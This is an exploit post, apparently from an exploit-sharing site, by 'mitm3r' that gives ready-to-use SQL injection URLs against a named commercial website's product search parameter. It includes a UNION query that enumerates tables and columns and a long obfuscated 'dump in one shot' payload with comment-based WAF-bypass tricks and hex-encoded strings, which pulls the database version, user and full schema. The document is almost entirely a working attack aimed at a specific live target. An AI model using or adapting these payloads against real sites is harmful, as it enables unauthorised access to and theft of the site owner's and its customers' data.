|\        /|  |  --------  |\        /| -------/  |---------/
| \      / |  |     |      | \      / |       /   |        /
|  \    /  |  |     |      |  \    /  |      /    |       /
|   \  /   |  |     |      |   \  /   |     /     |      /
|    \/    |  |     |      |    \/    |    /      |     /
|          |  |     |      |          |   /       |----/
|          |  |     |      |          |  /-----   |    \
|          |  |     |      |          |       /   |     \
|          |  |     |      |          |      /    |      \
|          |  |     |      |          |     /     |       \
|          |  |     |      |          |    /      |        \
|          |  |     |      |          |   /       |         \
|          |  |     |      |          |  /        |          \ @mitm3r
 
-----------------------------------------------------------------------------------------------
Site: http://sleepwellproducts.com/
-----------------------------------------------------------------------------------------------
######################
# Exploit Title : Sleepwellproducts SQL Injection
# Exploit Author : mitm3r
# Contact: [email protected]
# Vendor Homepage : http://sleepwellproducts.com
# Tested On : Windows7 / Kali linux / Mozzilla firefox
######################
# Target:
# http://sleepwellproducts.com/products/searchByKeyword/?keyword_search=.1'

# http://sleepwellproducts.com/products/searchByKeyword/?keyword_search=.1' union select 1,2,3,4,group_concat(table_name,column_name),6,7,8,9,10,11,12,13 from information_schema.columns where table_schema=database()--+-

# DIOS (Dump in one shot) query
http://sleepwellproducts.com/products/searchByKeyword/?keyword_search=.1' union select 1,2,3,4,concat/*!(unhex(hex(concat/*!(0x3c2f6469763e3c2f696d673e3c2f613e3c2f703e3c2f7469746c653e,0x223e,0x273e,0x3c62723e3c62723e,unhex(hex(concat/*!(0x3c63656e7465723e3c666f6e7420636f6c6f723d7265642073697a653d343e3c623e3a3a207e7472306a416e2a2044756d7020496e204f6e652053686f74205175657279203c666f6e7420636f6c6f723d626c75653e28574146204279706173736564203a2d20207620312e30293c2f666f6e743e203c2f666f6e743e3c2f63656e7465723e3c2f623e))),0x3c62723e3c62723e,0x3c666f6e7420636f6c6f723d626c75653e4d7953514c2056657273696f6e203a3a20,version(),0x7e20,@@version_comment,0x3c62723e5072696d617279204461746162617365203a3a20,@d:=database(),0x3c62723e44617461626173652055736572203a3a20,user(),(/*!12345selEcT*/(@x)/*!from*/(/*!12345selEcT*/(@x:=0x00),(@r:=0),(@running_number:=0),(@tbl:=0x00),(/*!12345selEcT*/(0) from(information_schema./**/columns)where(table_schema=database()) and(0x00)in(@x:=Concat/*!(@x, 0x3c62723e, if( (@tbl!=table_name), Concat/*!(0x3c666f6e7420636f6c6f723d707572706c652073697a653d333e,0x3c62723e,0x3c666f6e7420636f6c6f723d626c61636b3e,LPAD(@r:[email protected]%2b1, 2, 0x30),0x2e203c2f666f6e743e,@tbl:=table_name,0x203c666f6e7420636f6c6f723d677265656e3e3a3a204461746162617365203a3a203c666f6e7420636f6c6f723d626c61636b3e28,database(),0x293c2f666f6e743e3c2f666f6e743e,0x3c2f666f6e743e,0x3c62723e), 0x00),0x3c666f6e7420636f6c6f723d626c61636b3e,LPAD(@running_number:[email protected]_number%2b1,3,0x30),0x2e20,0x3c2f666f6e743e,0x3c666f6e7420636f6c6f723d7265643e,column_name,0x3c2f666f6e743e))))x)))))*/,6,7,8,9,10,11,12,13 from information_schema.columns where table_schema=database()--+-

# siph0n [2018-05-17]